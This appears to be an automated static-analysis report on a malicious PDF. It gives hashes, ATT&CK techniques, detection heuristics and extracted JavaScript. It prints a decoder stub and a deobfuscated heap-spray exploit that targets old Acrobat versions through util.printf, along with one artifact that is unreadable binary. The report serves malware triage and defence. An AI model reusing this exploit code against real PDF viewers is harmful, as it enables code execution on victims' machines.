Malicious PDF / .BIN — malware analysis report

Static analysis result for SHA-256 8847f884506c1a89…

MALICIOUS

PDF / .BIN

28.7 KB Created: .Ö×Hö+¬U'zº~{މÎ'y033¤·° First seen: 2026-05-09
MD5: 00e80904cd0d15e08aff90e498d62b9c SHA-1: 29b3ce28fea7a7a543f6cae1602013f6ec0b883d SHA-256: 8847f884506c1a895a9aea8ae9eca1c7caee7fc7f6479dd81119e011015dc2a4
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript that is obfuscated and designed to exploit vulnerabilities in PDF viewers. The script utilizes functions like unescape, String.fromCharCode, and util.printf, indicating an attempt to execute arbitrary code. The ML classifier also flagged this PDF as highly malicious. The primary script attempts to download and execute a second-stage payload, which is a common technique for malware delivery.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Encrypted PDF carries /JavaScript — payload hidden from static analysis high PDF_ENCRYPTED_WITH_JS
    PDF declares /Encrypt and also references an executable trigger (/JavaScript). Document encryption hides the JavaScript body and stream contents from static scanners — combined with auto-execution indicators this is a known evasion pattern used to deliver weaponised JavaScript that the analyst cannot inspect without the decryption key.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0017_000.js pdf-javascript-stream PDF /JS object 17 at offset 0x410F 134 bytes
SHA-256: a84216a6a196d23cde2c0ad3a79cee34311530435c6aa9374714ea7d2a19d0e5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
eval(""+''+unescape(this.getField("data").value.replace(new RegExp("\\"+String.fromCharCode(124,65),"g"),String.fromCharCode(37))));
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x10C6 995 bytes
SHA-256: a6938e522009382a5f73ef30a45ce3382332361818a2c338c945cc4be3188f4a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var vv = app.viewerVersion.toString().replace(/\D/g, "");
var vs = new Array();

vs[0] = vv.charAt(0)?vv.charAt(0):0;
vs[1] = vv.charAt(1)?vv.charAt(1):0;
vs[2] = vv.charAt(2)?vv.charAt(2):0;

var vva = (vs[0] < 7);
var vvb = (vs[0] == 7 && vs[1] < 1);
var vvc = (vs[0] == 8 && vs[1] <= 1 && vs[2] <= 2);

if(vva || vvb || vvc) {
var sccs = unescape(this.getField("text").value.replace(new RegExp("\\"+String.fromCharCode(124,65), "g"), String.fromCharCode(37)));

	var bgbl = unescape("%u0A0A"+"%u0A0A");
	var slspc = 20 + sccs.length;
	while(bgbl.length < slspc) bgbl += bgbl;
	var fblk = bgbl.substring(0,slspc);
	var blk = bgbl.substring(0,bgbl.length - slspc);
	while(blk.length + slspc < 0x60000) blk = blk + blk + fblk;

	var mmy = new Array();
	for(i = 0; i < 1200; i++){ mmy[i] = blk + sccs }

var nm = 12;
for(i=0;i<18;i++){ nm = nm + "9"; }
for(i=0;i<276;i++){ nm = nm + "8"; }

util.printf(unescape(""+"%"+"254%"+"35000f"), nm);
}

this.closeDoc(true);
javascript_obj0021_000.js pdf-javascript-stream PDF /JS object 21 at offset 0x177C 134 bytes
SHA-256: 3d7f5c4248fade4a0f7ca93c07aa91d178d83e902ca746c2bdc5ee022cbb0337
Preview script
First 1,000 lines of the extracted script
ϖ<� � ���4!VP�G�^��hV�-F��� ~y��J�<� �uU�5~_ &� ɦ
� Q�� �&� �!{#r�ZW�*2A�$�:;r�m���@늰��\ ��G�
���$ԑ���Y&�x��� ��ԓ !� ą �"f�Y